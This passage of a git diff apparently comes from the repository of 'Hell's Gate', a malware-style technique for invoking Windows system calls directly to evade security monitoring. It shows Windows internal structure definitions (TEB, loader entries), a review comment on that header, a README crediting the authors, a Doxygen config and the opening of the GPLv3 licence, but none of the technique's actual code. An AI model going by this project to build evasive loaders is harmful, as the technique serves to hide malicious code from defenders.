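+PVOID GdiThreadLocalInfo;
+PSIZE_T Win32ClientInfo[62];
+PVOID glDispatchTable[233];
+PSIZE_T glReserved1[29];
+PVOID glReserved2;
+PVOID glSectionInfo;
+PVOID glSection;
+PVOID glTable;
+PVOID glCurrentRC;
+PVOID glContext;
+NTSTATUS LastStatusValue;
+UNICODE_STRING StaticUnicodeString;
+WCHAR StaticUnicodeBuffer[261];
+PVOID DeallocationStack;
+PVOID TlsSlots[64];
+LIST_ENTRY TlsLinks;
+PVOID Vdm;
+PVOID ReservedForNtRpc;
+PVOID DbgSsReserved[2];
+#if (NTDDI_VERSION >= NTDDI_WS03)
+ULONG HardErrorMode;
+#else
+ULONG HardErrorsAreDisabled;
+#endif
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+PVOID Instrumentation[13 - sizeof(GUID) / sizeof(PVOID)];
+GUID ActivityId;
+PVOID SubProcessTag;
+PVOID EtwLocalData;
+PVOID EtwTraceData;
+#elif (NTDDI_VERSION >= NTDDI_WS03)
+PVOID Instrumentation[14];
+PVOID SubProcessTag;
+PVOID EtwLocalData;
+#else
+PVOID Instrumentation[16];
+#endif
+PVOID WinSockData;
+ULONG GdiBatchCount;
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+BOOLEAN SpareBool0;
+BOOLEAN SpareBool1;
+BOOLEAN SpareBool2;
+#else
+BOOLEAN InDbgPrint;
+BOOLEAN FreeStackOnTermination;
+BOOLEAN HasFiberData;
+#endif
+UCHAR IdealProcessor;
+#if (NTDDI_VERSION >= NTDDI_WS03)
+ULONG GuaranteedStackBytes;
+#else
+ULONG Spare3;
+#endif
+PVOID ReservedForPerf;
+PVOID ReservedForOle;
+ULONG WaitingOnLoaderLock;
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+PVOID SavedPriorityState;
+ULONG_PTR SoftPatchPtr1;
+ULONG_PTR ThreadPoolData;
+#elif (NTDDI_VERSION >= NTDDI_WS03)
+ULONG_PTR SparePointer1;
+ULONG_PTR SoftPatchPtr1;
+ULONG_PTR SoftPatchPtr2;
+#else
+Wx86ThreadState Wx86Thread;
+#endif
+PVOID* TlsExpansionSlots;
+#if defined(_WIN64) && !defined(EXPLICIT_32BIT)
+PVOID DeallocationBStore;
+PVOID BStoreLimit;
+#endif
+ULONG ImpersonationLocale;
+ULONG IsImpersonating;
+PVOID NlsCache;
+PVOID pShimData;
+ULONG HeapVirtualAffinity;
+HANDLE CurrentTransactionHandle;
+PTEB_ACTIVE_FRAME ActiveFrame;
+#if (NTDDI_VERSION >= NTDDI_WS03)
+PVOID FlsData;
+#endif
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+PVOID PreferredLangauges;
+PVOID UserPrefLanguages;
+PVOID MergedPrefLanguages;
+ULONG MuiImpersonation;
+union
+{
+struct
+{
+USHORT SpareCrossTebFlags : 16;
+};
+USHORT CrossTebFlags;
+};
+union
+{
+struct
+{
+USHORT DbgSafeThunkCall : 1;
+USHORT DbgInDebugPrint : 1;
+USHORT DbgHasFiberData : 1;
+USHORT DbgSkipThreadAttach : 1;
+USHORT DbgWerInShipAssertCode : 1;
+USHORT DbgIssuedInitialBp : 1;
+USHORT DbgClonedThread : 1;
+USHORT SpareSameTebBits : 9;
+};
+USHORT SameTebFlags;
+};
+PVOID TxnScopeEntercallback;
+PVOID TxnScopeExitCAllback;
+PVOID TxnScopeContext;
+ULONG LockCount;
+ULONG ProcessRundown;
+ULONG64 LastSwitchTime;
+ULONG64 TotalSwitchOutTime;
+LARGE_INTEGER WaitReasonBitMap;
+#else
+BOOLEAN SafeThunkCall;
+BOOLEAN BooleanSpare[3];
+#endif
+} TEB, * PTEB;
+
+typedef struct _LDR_DATA_TABLE_ENTRY {
+LIST_ENTRY InLoadOrderLinks;
+LIST_ENTRY InMemoryOrderLinks;
+LIST_ENTRY InInitializationOrderLinks;
+PVOID DllBase;
+PVOID EntryPoint;
+ULONG SizeOfImage;
+UNICODE_STRING FullDllName;
+UNICODE_STRING BaseDllName;
+ULONG Flags;
+WORD LoadCount;
+WORD TlsIndex;
+union {
+LIST_ENTRY HashLinks;
+struct {
+PVOID SectionPointer;
+ULONG CheckSum;
+};
+};
+union {
+ULONG TimeDateStamp;
+PVOID LoadedImports;
+};
+PACTIVATION_CONTEXT EntryPointActivationContext;
+PVOID PatchInformation;
+LIST_ENTRY ForwarderLinks;
+LIST_ENTRY ServiceTagLinks;
+LIST_ENTRY StaticLinks;
+} LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;
+
+typedef struct _OBJECT_ATTRIBUTES {
+ULONG Length;
+PVOID RootDirectory;
+PUNICODE_STRING ObjectName;
+ULONG Attributes;
+PVOID SecurityDescriptor;
+PVOID SecurityQualityOfService;
+} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
+
+typedef struct _INITIAL_TEB {
+PVOID StackBase;
+PVOID StackLimit;
+PVOID StackCommit;
+PVOID StackCommitMax;
+PVOID StackReserved;
+} INITIAL_TEB, * PINITIAL_TEB;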
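Review bot: In `_RTL_ACTIVATION_CONTEXT_STACK_FRAME` the `Previous` member is declared as `struct __RTL_ACTIVATION_CONTEXT_STACK_FRAME*` (two leading underscores) while the enclosing tag has one, so it points to an unrelated incomplete type instead of to its own struct; `struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous;` is what was intended. The `#else` branch under `WaitingOnLoaderLock` in `_TEB` names `Wx86ThreadState`, which nothing in this header declares, so that configuration would not compile (unreachable with current NTDDI_VERSION values, but worth a comment). Since main.c reads only `OSMajorVersion` and `LoaderData` from PEB, `ProcessEnvironmentBlock` from TEB and `DllBase` from LDR_DATA_TABLE_ENTRY, a header comment stating which fields are relied on and that their offsets were checked against 64-bit Windows 10 would make later edits to these large structs safer.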
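--- a/Hells Gate/C Implementation/README.md
+++ b/Hells Gate/C Implementation/README.md
@@ -0,0 +1,21 @@
+## Hell's Gate ##
+
+Original C Implementation of the Hell's Gate VX Technique
+<br />
+<br />
+Link to the paper: https://vxug.fakedoma.in/papers/hells-gate.pdf
+<br /> PDF also included in this repository.
+<br />
+<br />
+Authors:
+* Paul Laîné (@am0nsec)
+* smelly__vx (@RtlMateusz)
+<br />
+
+### Update ###
+Please note:
+* We are not claiming that this is ground-breaking as many people have been using this kind of technique for many years;
+* We are not claiming that this is the perfect and most optimised way to archive the objective. This is just one example on how to implementation the technique;
+* Judging the idea/technique/project/research solely on the name is petty to say the least and definitively childish; and
+* Any recommendation and/or ideas will always be welcome, just open an issue in this repository.
+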
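--- a/Hells Gate/C# Implementation/Doxyfile
+++ b/Hells Gate/C# Implementation/Doxyfile
@@ -0,0 +1,385 @@
+# Doxyfile 1.8.18
+
+#---------------------------------------------------------------------------
+# Project related configuration options
+#---------------------------------------------------------------------------
+DOXYFILE_ENCODING = UTF-8
+PROJECT_NAME = "Shap Hell's Gate"
+PROJECT_NUMBER = 1.0
+PROJECT_BRIEF = "C# Implementation of the Hell's Gate VX Technique"
+PROJECT_LOGO =
+OUTPUT_DIRECTORY = ./doc/
+CREATE_SUBDIRS = YES
+ALLOW_UNICODE_NAMES = NO
+OUTPUT_LANGUAGE = English
+OUTPUT_TEXT_DIRECTION = None
+BRIEF_MEMBER_DESC = YES
+REPEAT_BRIEF = YES
+ABBREVIATE_BRIEF = "The $name class" \
+"The $name widget" \
+"The $name file" \
+is \
+provides \
+specifies \
+contains \
+represents \
+a \
+an \
+the
+ALWAYS_DETAILED_SEC = NO
+INLINE_INHERITED_MEMB = NO
+FULL_PATH_NAMES = YES
+STRIP_FROM_PATH =
+STRIP_FROM_INC_PATH =
+SHORT_NAMES = NO
+JAVADOC_AUTOBRIEF = NO
+JAVADOC_BANNER = NO
+QT_AUTOBRIEF = NO
+MULTILINE_CPP_IS_BRIEF = NO
+INHERIT_DOCS = YES
+SEPARATE_MEMBER_PAGES = NO
+TAB_SIZE = 4
+ALIASES =
+OPTIMIZE_OUTPUT_FOR_C = NO
+OPTIMIZE_OUTPUT_JAVA = NO
+OPTIMIZE_FOR_FORTRAN = NO
+OPTIMIZE_OUTPUT_VHDL = NO
+OPTIMIZE_OUTPUT_SLICE = NO
+EXTENSION_MAPPING =
+MARKDOWN_SUPPORT = YES
+TOC_INCLUDE_HEADINGS = 5
+AUTOLINK_SUPPORT = YES
+BUILTIN_STL_SUPPORT = NO
+CPP_CLI_SUPPORT = NO
+SIP_SUPPORT = NO
+IDL_PROPERTY_SUPPORT = YES
+DISTRIBUTE_GROUP_DOC = NO
+GROUP_NESTED_COMPOUNDS = NO
+SUBGROUPING = YES
+INLINE_GROUPED_CLASSES = NO
+INLINE_SIMPLE_STRUCTS = NO
+TYPEDEF_HIDES_STRUCT = NO
+LOOKUP_CACHE_SIZE = 0
+#---------------------------------------------------------------------------
+# Build related configuration options
+#---------------------------------------------------------------------------
+EXTRACT_ALL = YES
+EXTRACT_PRIVATE = YES
+EXTRACT_PRIV_VIRTUAL = YES
+EXTRACT_PACKAGE = YES
+EXTRACT_STATIC = YES
+EXTRACT_LOCAL_CLASSES = YES
+EXTRACT_LOCAL_METHODS = NO
+EXTRACT_ANON_NSPACES = YES
+HIDE_UNDOC_MEMBERS = NO
+HIDE_UNDOC_CLASSES = NO
+HIDE_FRIEND_COMPOUNDS = NO
+HIDE_IN_BODY_DOCS = NO
+INTERNAL_DOCS = NO
+CASE_SENSE_NAMES = YES
+HIDE_SCOPE_NAMES = NO
+HIDE_COMPOUND_REFERENCE= NO
+SHOW_INCLUDE_FILES = YES
+SHOW_GROUPED_MEMB_INC = NO
+FORCE_LOCAL_INCLUDES = NO
+INLINE_INFO = YES
+SORT_MEMBER_DOCS = YES
+SORT_BRIEF_DOCS = NO
+SORT_MEMBERS_CTORS_1ST = NO
+SORT_GROUP_NAMES = NO
+SORT_BY_SCOPE_NAME = NO
+STRICT_PROTO_MATCHING = NO
+GENERATE_TODOLIST = YES
+GENERATE_TESTLIST = YES
+GENERATE_BUGLIST = YES
+GENERATE_DEPRECATEDLIST= YES
+ENABLED_SECTIONS =
+MAX_INITIALIZER_LINES = 30
+SHOW_USED_FILES = YES
+SHOW_FILES = YES
+SHOW_NAMESPACES = YES
+FILE_VERSION_FILTER =
+LAYOUT_FILE =
+CITE_BIB_FILES =
+#---------------------------------------------------------------------------
+# Configuration options related to warning and progress messages
+#---------------------------------------------------------------------------
+QUIET = NO
+WARNINGS = YES
+WARN_IF_UNDOCUMENTED = YES
+WARN_IF_DOC_ERROR = YES
+WARN_NO_PARAMDOC = NO
+WARN_AS_ERROR = NO
+WARN_FORMAT = "$file:$line: $text"
+WARN_LOGFILE =
+#---------------------------------------------------------------------------
+# Configuration options related to the input files
+#---------------------------------------------------------------------------
+INPUT = .
+INPUT_ENCODING = UTF-8
+FILE_PATTERNS = *.c \
+*.cc \
+*.cxx \
+*.cpp \
+*.c++ \
+*.java \
+*.ii \
+*.ixx \
+*.ipp \
+*.i++ \
+*.inl \
+*.idl \
+*.ddl \
+*.odl \
+*.h \
+*.hh \
+*.hxx \
+*.hpp \
+*.h++ \
+*.cs \
+*.d \
+*.php \
+*.php4 \
+*.php5 \
+*.phtml \
+*.inc \
+*.m \
+*.markdown \
+*.md \
+*.mm \
+*.dox \
+*.doc \
+*.txt \
+*.py \
+*.pyw \
+*.f90 \
+*.f95 \
+*.f03 \
+*.f08 \
+*.f18 \
+*.f \
+*.for \
+*.vhd \
+*.vhdl \
+*.ucf \
+*.qsf \
+*.ice
+RECURSIVE = YES
+EXCLUDE =
+EXCLUDE_SYMLINKS = NO
+EXCLUDE_PATTERNS =
+EXCLUDE_SYMBOLS =
+EXAMPLE_PATH =
+EXAMPLE_PATTERNS = *
+EXAMPLE_RECURSIVE = NO
+IMAGE_PATH =
+INPUT_FILTER =
+FILTER_PATTERNS =
+FILTER_SOURCE_FILES = NO
+FILTER_SOURCE_PATTERNS =
+USE_MDFILE_AS_MAINPAGE =
+#---------------------------------------------------------------------------
+# Configuration options related to source browsing
+#---------------------------------------------------------------------------
+SOURCE_BROWSER = YES
+INLINE_SOURCES = YES
+STRIP_CODE_COMMENTS = YES
+REFERENCED_BY_RELATION = YES
+REFERENCES_RELATION = NO
+REFERENCES_LINK_SOURCE = YES
+SOURCE_TOOLTIPS = YES
+USE_HTAGS = NO
+VERBATIM_HEADERS = YES
+CLANG_ASSISTED_PARSING = NO
+CLANG_OPTIONS =
+CLANG_DATABASE_PATH =
+#---------------------------------------------------------------------------
+# Configuration options related to the alphabetical class index
+#---------------------------------------------------------------------------
+ALPHABETICAL_INDEX = YES
+COLS_IN_ALPHA_INDEX = 5
+IGNORE_PREFIX =
+#---------------------------------------------------------------------------
+# Configuration options related to the HTML output
+#---------------------------------------------------------------------------
+GENERATE_HTML = YES
+HTML_OUTPUT = html
+HTML_FILE_EXTENSION = .html
+HTML_HEADER =
+HTML_FOOTER =
+HTML_STYLESHEET =
+HTML_EXTRA_STYLESHEET =
+HTML_EXTRA_FILES =
+HTML_COLORSTYLE_HUE = 220
+HTML_COLORSTYLE_SAT = 100
+HTML_COLORSTYLE_GAMMA = 80
+HTML_TIMESTAMP = YES
+HTML_DYNAMIC_MENUS = YES
+HTML_DYNAMIC_SECTIONS = NO
+HTML_INDEX_NUM_ENTRIES = 100
+GENERATE_DOCSET = NO
+DOCSET_FEEDNAME = "Doxygen generated docs"
+DOCSET_BUNDLE_ID = org.doxygen.Project
+DOCSET_PUBLISHER_ID = org.doxygen.Publisher
+DOCSET_PUBLISHER_NAME = Publisher
+GENERATE_HTMLHELP = NO
+CHM_FILE =
+HHC_LOCATION =
+GENERATE_CHI = NO
+CHM_INDEX_ENCODING =
+BINARY_TOC = NO
+TOC_EXPAND = NO
+GENERATE_QHP = NO
+QCH_FILE =
+QHP_NAMESPACE = org.doxygen.Project
+QHP_VIRTUAL_FOLDER = doc
+QHP_CUST_FILTER_NAME =
+QHP_CUST_FILTER_ATTRS =
+QHP_SECT_FILTER_ATTRS =
+QHG_LOCATION =
+GENERATE_ECLIPSEHELP = NO
+ECLIPSE_DOC_ID = org.doxygen.Project
+DISABLE_INDEX = NO
+GENERATE_TREEVIEW = YES
+ENUM_VALUES_PER_LINE = 4
+TREEVIEW_WIDTH = 250
+EXT_LINKS_IN_WINDOW = NO
+HTML_FORMULA_FORMAT = png
+FORMULA_FONTSIZE = 10
+FORMULA_TRANSPARENT = YES
+FORMULA_MACROFILE =
+USE_MATHJAX = NO
+MATHJAX_FORMAT = HTML-CSS
+MATHJAX_RELPATH = https://cdn.jsdelivr.net/npm/mathjax@2
+MATHJAX_EXTENSIONS =
+MATHJAX_CODEFILE =
+SEARCHENGINE = YES
+SERVER_BASED_SEARCH = NO
+EXTERNAL_SEARCH = NO
+SEARCHENGINE_URL =
+SEARCHDATA_FILE = searchdata.xml
+EXTERNAL_SEARCH_ID =
+EXTRA_SEARCH_MAPPINGS =
+#---------------------------------------------------------------------------
+# Configuration options related to the LaTeX output
+#---------------------------------------------------------------------------
+GENERATE_LATEX = NO
+LATEX_OUTPUT = latex
+LATEX_CMD_NAME =
+MAKEINDEX_CMD_NAME = makeindex
+LATEX_MAKEINDEX_CMD = makeindex
+COMPACT_LATEX = NO
+PAPER_TYPE = a4
+EXTRA_PACKAGES =
+LATEX_HEADER =
+LATEX_FOOTER =
+LATEX_EXTRA_STYLESHEET =
+LATEX_EXTRA_FILES =
+PDF_HYPERLINKS = YES
+USE_PDFLATEX = YES
+LATEX_BATCHMODE = NO
+LATEX_HIDE_INDICES = NO
+LATEX_SOURCE_CODE = NO
+LATEX_BIB_STYLE = plain
+LATEX_TIMESTAMP = NO
+LATEX_EMOJI_DIRECTORY =
+#---------------------------------------------------------------------------
+# Configuration options related to the RTF output
+#---------------------------------------------------------------------------
+GENERATE_RTF = NO
+RTF_OUTPUT = rtf
+COMPACT_RTF = NO
+RTF_HYPERLINKS = NO
+RTF_STYLESHEET_FILE =
+RTF_EXTENSIONS_FILE =
+RTF_SOURCE_CODE = NO
+#---------------------------------------------------------------------------
+# Configuration options related to the man page output
+#---------------------------------------------------------------------------
+GENERATE_MAN = NO
+MAN_OUTPUT = man
+MAN_EXTENSION = .3
+MAN_SUBDIR =
+MAN_LINKS = NO
+#---------------------------------------------------------------------------
+# Configuration options related to the XML output
+#---------------------------------------------------------------------------
+GENERATE_XML = NO
+XML_OUTPUT = xml
+XML_PROGRAMLISTING = YES
+XML_NS_MEMB_FILE_SCOPE = NO
+#---------------------------------------------------------------------------
+# Configuration options related to the DOCBOOK output
+#---------------------------------------------------------------------------
+GENERATE_DOCBOOK = NO
+DOCBOOK_OUTPUT = docbook
+DOCBOOK_PROGRAMLISTING = NO
+#---------------------------------------------------------------------------
+# Configuration options for the AutoGen Definitions output
+#---------------------------------------------------------------------------
+GENERATE_AUTOGEN_DEF = NO
+#---------------------------------------------------------------------------
+# Configuration options related to the Perl module output
+#---------------------------------------------------------------------------
+GENERATE_PERLMOD = NO
+PERLMOD_LATEX = NO
+PERLMOD_PRETTY = YES
+PERLMOD_MAKEVAR_PREFIX =
+#---------------------------------------------------------------------------
+# Configuration options related to the preprocessor
+#---------------------------------------------------------------------------
+ENABLE_PREPROCESSING = YES
+MACRO_EXPANSION = NO
+EXPAND_ONLY_PREDEF = NO
+SEARCH_INCLUDES = YES
+INCLUDE_PATH =
+INCLUDE_FILE_PATTERNS =
+PREDEFINED =
+EXPAND_AS_DEFINED =
+SKIP_FUNCTION_MACROS = YES
+#---------------------------------------------------------------------------
+# Configuration options related to external references
+#---------------------------------------------------------------------------
+TAGFILES =
+GENERATE_TAGFILE =
+ALLEXTERNALS = NO
+EXTERNAL_GROUPS = YES
+EXTERNAL_PAGES = YES
+#---------------------------------------------------------------------------
+# Configuration options related to the dot tool
+#---------------------------------------------------------------------------
+CLASS_DIAGRAMS = YES
+DIA_PATH =
+HIDE_UNDOC_RELATIONS = YES
+HAVE_DOT = NO
+DOT_NUM_THREADS = 1
+DOT_FONTNAME = Helvetica
+DOT_FONTSIZE = 10
+DOT_FONTPATH =
+CLASS_GRAPH = YES
+COLLABORATION_GRAPH = YES
+GROUP_GRAPHS = YES
+UML_LOOK = NO
+UML_LIMIT_NUM_FIELDS = 10
+TEMPLATE_RELATIONS = NO
+INCLUDE_GRAPH = YES
+INCLUDED_BY_GRAPH = YES
+CALL_GRAPH = NO
+CALLER_GRAPH = NO
+GRAPHICAL_HIERARCHY = YES
+DIRECTORY_GRAPH = YES
+DOT_IMAGE_FORMAT = png
+INTERACTIVE_SVG = NO
+DOT_PATH =
+DOTFILE_DIRS =
+MSCFILE_DIRS =
+DIAFILE_DIRS =
+PLANTUML_JAR_PATH =
+PLANTUML_CFG_FILE =
+PLANTUML_INCLUDE_PATH =
+DOT_GRAPH_MAX_NODES = 50
+MAX_DOT_GRAPH_DEPTH = 0
+DOT_TRANSPARENT = NO
+DOT_MULTI_TARGETS = YES
+GENERATE_LEGEND = YES
+DOT_CLEANUP = YES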
674
Hells Gate/C# Implementation/LICENSE
Normal file
674
Hells Gate/C# Implementation/LICENSE
Normal file
@ -0,0 +1,674 @@
|
|||||||
|
GNU GENERAL PUBLIC LICENSE
|
||||||
|
Version 3, 29 June 2007
|
||||||
|
|
||||||
|
Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
|
||||||
|
Everyone is permitted to copy and distribute verbatim copies
|
||||||
|
of this license document, but changing it is not allowed.
|
||||||
|
|
||||||
|
Preamble
|
||||||
|
|
||||||
|
The GNU General Public License is a free, copyleft license for
|
||||||
|
software and other kinds of works.
|
||||||
|
|
||||||
|
The licenses for most software and other practical works are designed
|
||||||
|
to take away your freedom to share and change the works. By contrast,
|
||||||
|
the GNU General Public License is intended to guarantee your freedom to
|
||||||
|
share and change all versions of a program--to make sure it remains free
|
||||||
|
software for all its users. We, the Free Software Foundation, use the
|
||||||
|
GNU General Public License for most of our software; it applies also to
|
||||||
|
any other work released this way by its authors. You can apply it to
|
||||||
|
your programs, too.
|
||||||
|
|
||||||
|
When we speak of free software, we are referring to freedom, not
|
||||||
|
price. Our General Public Licenses are designed to make sure that you
|
||||||
|
have the freedom to distribute copies of free software (and charge for
|
||||||
|
them if you wish), that you receive source code or can get it if you
|
||||||
|
want it, that you can change the software or use pieces of it in new
|
||||||
|
free programs, and that you know you can do these things.
|
||||||
|
|
||||||
|
To protect your rights, we need to prevent others from denying you
|
||||||
|
these rights or asking you to surrender the rights. Therefore, you have
|
||||||
|
certain responsibilities if you distribute copies of the software, or if
|
||||||
|
you modify it: responsibilities to respect the freedom of others.
|
||||||
|
|
||||||
|
For example, if you distribute copies of such a program, whether
|
||||||
|
gratis or for a fee, you must pass on to the recipients the same
|
||||||
|
freedoms that you received. You must make sure that they, too, receive
|
||||||
|
or can get the source code. And you must show them these terms so they
|
||||||
|
know their rights.
|
||||||
|
|
||||||
|
Developers that use the GNU GPL protect your rights with two steps:
|
||||||
|
(1) assert copyright on the software, and (2) offer you this License
|
||||||
|
giving you legal permission to copy, distribute and/or modify it.
|
||||||
|
|
||||||
|
For the developers' and authors' protection, the GPL clearly explains
|
||||||
|
that there is no warranty for this free software. For both users' and
|
||||||
|
authors' sake, the GPL requires that modified versions be marked as
|
||||||
|
changed, so that their problems will not be attributed erroneously to
|
||||||
|
authors of previous versions.
|
||||||
|
|
||||||
|
Some devices are designed to deny users access to install or run
|
||||||
|
modified versions of the software inside them, although the manufacturer
|
||||||
|
can do so. This is fundamentally incompatible with the aim of
|
||||||
|
protecting users' freedom to change the software. The systematic
|
||||||
|
pattern of such abuse occurs in the area of products for individuals to
|
||||||
|
use, which is precisely where it is most unacceptable. Therefore, we
|
||||||
|
have designed this version of the GPL to prohibit the practice for those
|
||||||
|
products. If such problems arise substantially in other domains, we
|
||||||
|
stand ready to extend this provision to those domains in future versions
|
||||||
|
of the GPL, as needed to protect the freedom of users.
|
||||||
|
|
||||||
|
Finally, every program is threatened constantly by software patents.
|
||||||
|
States should not allow patents to restrict development and use of
|
||||||
|
software on general-purpose computers, but in those that do, we wish to
|
||||||
|
avoid the special danger that patents applied to a free program could
|
||||||
|
make it effectively proprietary. To prevent this, the GPL assures that
|
||||||
|
patents cannot be used to render the program non-free.
|
||||||
|
|
||||||
|
The precise terms and conditions for copying, distribution and
|
||||||
|
modification follow.
|
||||||
|
|
||||||
|
TERMS AND CONDITIONS
|
||||||
|
|
||||||
|
0. Definitions.
|
||||||
|
|
||||||
|
"This License" refers to version 3 of the GNU General Public License.
|
||||||
|
|
||||||
|
"Copyright" also means copyright-like laws that apply to other kinds of
|
||||||
|
works, such as semiconductor masks.
|
||||||
|
|
||||||
|
"The Program" refers to any copyrightable work licensed under this
|
||||||
|
License. Each licensee is addressed as "you". "Licensees" and
|
||||||
|
"recipients" may be individuals or organizations.
|
||||||
|
|
||||||
|
To "modify" a work means to copy from or adapt all or part of the work
|
||||||
|
in a fashion requiring copyright permission, other than the making of an
|
||||||
|
exact copy. The resulting work is called a "modified version" of the
|
||||||
|
earlier work or a work "based on" the earlier work.
|
||||||
|
|
||||||
|
A "covered work" means either the unmodified Program or a work based
|
||||||
|
on the Program.
|
||||||
|
|
||||||
|
To "propagate" a work means to do anything with it that, without
|
||||||
|
permission, would make you directly or secondarily liable for
|
||||||
|
infringement under applicable copyright law, except executing it on a
|
||||||
|
computer or modifying a private copy. Propagation includes copying,
|
||||||
|
distribution (with or without modification), making available to the
|
||||||
|
public, and in some countries other activities as well.
|
||||||
|
|
||||||
|
To "convey" a work means any kind of propagation that enables other
|
||||||
|
parties to make or receive copies. Mere interaction with a user through
|
||||||
|
a computer network, with no transfer of a copy, is not conveying.
|
||||||
|
|
||||||
|
An interactive user interface displays "Appropriate Legal Notices"
|
||||||
|
to the extent that it includes a convenient and prominently visible
|
||||||
|
feature that (1) displays an appropriate copyright notice, and (2)
|
||||||
|
tells the user that there is no warranty for the work (except to the
|
||||||
|
extent that warranties are provided), that licensees may convey the
|
||||||
|
work under this License, and how to view a copy of this License. If
|
||||||
|
the interface presents a list of user commands or options, such as a
|
||||||
|
menu, a prominent item in the list meets this criterion.
|
||||||
|
|
||||||
|
1. Source Code.
|
||||||
|
|
||||||
|
The "source code" for a work means the preferred form of the work
|
||||||
|
for making modifications to it. "Object code" means any non-source
|
||||||
|
form of a work.
|
||||||
|
|
||||||
|
A "Standard Interface" means an interface that either is an official
|
||||||
|
standard defined by a recognized standards body, or, in the case of
|
||||||
|
interfaces specified for a particular programming language, one that
|
||||||
|
is widely used among developers working in that language.
|
||||||
|
|
||||||
|
The "System Libraries" of an executable work include anything, other
|
||||||
|
than the work as a whole, that (a) is included in the normal form of
|
||||||
|
packaging a Major Component, but which is not part of that Major
|
||||||
|
Component, and (b) serves only to enable use of the work with that
|
||||||
|
Major Component, or to implement a Standard Interface for which an
|
||||||
|
implementation is available to the public in source code form. A
|
||||||
|
"Major Component", in this context, means a major essential component
|
||||||
|
(kernel, window system, and so on) of the specific operating system
|
||||||
|
(if any) on which the executable work runs, or a compiler used to
|
||||||
|
produce the work, or an object code interpreter used to run it.
|
||||||
|
|
||||||
|
The "Corresponding Source" for a work in object code form means all
|
||||||
|
the source code needed to generate, install, and (for an executable
|
||||||
|
work) run the object code and to modify the work, including scripts to
|
||||||
|
control those activities. However, it does not include the work's
|
||||||
|
System Libraries, or general-purpose tools or generally available free
|
||||||
|
programs which are used unmodified in performing those activities but
|
||||||
|
which are not part of the work. For example, Corresponding Source
|
||||||
|
includes interface definition files associated with source files for
|
||||||
|
the work, and the source code for shared libraries and dynamically
|
||||||
|
linked subprograms that the work is specifically designed to require,
|
||||||
|
such as by intimate data communication or control flow between those
|
||||||
|
subprograms and other parts of the work.
|
||||||
|
|
||||||
|
The Corresponding Source need not include anything that users
|
||||||
|
can regenerate automatically from other parts of the Corresponding
|
||||||
|
Source.
|
||||||
|
|
||||||
|
The Corresponding Source for a work in source code form is that
|
||||||
|
same work.
|
||||||
|
|
||||||
|
2. Basic Permissions.
|
||||||
|
|
||||||
|
All rights granted under this License are granted for the term of
|
||||||
|
copyright on the Program, and are irrevocable provided the stated
|
||||||
|
conditions are met. This License explicitly affirms your unlimited
|
||||||
|
permission to run the unmodified Program. The output from running a
|
||||||
|
covered work is covered by this License only if the output, given its
|
||||||
|
content, constitutes a covered work. This License acknowledges your
|
||||||
|
rights of fair use or other equivalent, as provided by copyright law.
|
||||||
|
|
||||||
|
You may make, run and propagate covered works that you do not
|
||||||
|
convey, without conditions so long as your license otherwise remains
|
||||||
|
in force. You may convey covered works to others for the sole purpose
|
||||||
|
of having them make modifications exclusively for you, or provide you
|
||||||
|
with facilities for running those works, provided that you comply with
|
||||||
|
the terms of this License in conveying all material for which you do
|
||||||
|
not control copyright. Those thus making or running the covered works
|
||||||
|
for you must do so exclusively on your behalf, under your direction
|
||||||
|
and control, on terms that prohibit them from making any copies of
|
||||||
|
your copyrighted material outside their relationship with you.
|
||||||
|
|
||||||
|
Conveying under any other circumstances is permitted solely under
|
||||||
|
the conditions stated below. Sublicensing is not allowed; section 10
|
||||||
|
makes it unnecessary.
|
||||||
|
|
||||||
|
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
|
||||||
|
|
||||||
|
No covered work shall be deemed part of an effective technological
|
||||||
|
measure under any applicable law fulfilling obligations under article
|
||||||
|
11 of the WIPO copyright treaty adopted on 20 December 1996, or
|
||||||
|
similar laws prohibiting or restricting circumvention of such
|
||||||
|
measures.
|
||||||
|
|
||||||
|
When you convey a covered work, you waive any legal power to forbid
|
||||||
|
circumvention of technological measures to the extent such circumvention
|
||||||
|
is effected by exercising rights under this License with respect to
|
||||||
|
the covered work, and you disclaim any intention to limit operation or
|
||||||
|
modification of the work as a means of enforcing, against the work's
|
||||||
|
users, your or third parties' legal rights to forbid circumvention of
|
||||||
|
technological measures.
|
||||||
|
|
||||||
|
4. Conveying Verbatim Copies.
|
||||||
|
|
||||||
|
You may convey verbatim copies of the Program's source code as you
|
||||||
|
receive it, in any medium, provided that you conspicuously and
|
||||||
|
appropriately publish on each copy an appropriate copyright notice;
|
||||||
|
keep intact all notices stating that this License and any
|
||||||
|
non-permissive terms added in accord with section 7 apply to the code;
|
||||||
|
keep intact all notices of the absence of any warranty; and give all
|
||||||
|
recipients a copy of this License along with the Program.
|
||||||
|
|
||||||
|
You may charge any price or no price for each copy that you convey,
|
||||||
|
and you may offer support or warranty protection for a fee.
|
||||||
|
|
||||||
|
5. Conveying Modified Source Versions.
|
||||||
|
|
||||||
|
You may convey a work based on the Program, or the modifications to
|
||||||
|
produce it from the Program, in the form of source code under the
|
||||||
|
terms of section 4, provided that you also meet all of these conditions:
|
||||||
|
|
||||||
|
a) The work must carry prominent notices stating that you modified
|
||||||
|
it, and giving a relevant date.
|
||||||
|
|
||||||
|
b) The work must carry prominent notices stating that it is
|
||||||
|
released under this License and any conditions added under section
|
||||||
|
7. This requirement modifies the requirement in section 4 to
|
||||||
|
"keep intact all notices".
|
||||||
|
|
||||||
|
c) You must license the entire work, as a whole, under this
|
||||||
|
License to anyone who comes into possession of a copy. This
|
||||||
|
License will therefore apply, along with any applicable section 7
|
||||||
|
additional terms, to the whole of the work, and all its parts,
|
||||||
|
regardless of how they are packaged. This License gives no
|
||||||
|
permission to license the work in any other way, but it does not
|
||||||
|
invalidate such permission if you have separately received it.
|
||||||
|
|
||||||
|
d) If the work has interactive user interfaces, each must display
|
||||||
|
Appropriate Legal Notices; however, if the Program has interactive
|
||||||
|
interfaces that do not display Appropriate Legal Notices, your
|
||||||
|
work need not make them do so.
|
||||||
|
|
||||||
|
A compilation of a covered work with other separate and independent
|
||||||
|
works, which are not by their nature extensions of the covered work,
|
||||||
|
and which are not combined with it such as to form a larger program,
|
||||||
|
in or on a volume of a storage or distribution medium, is called an
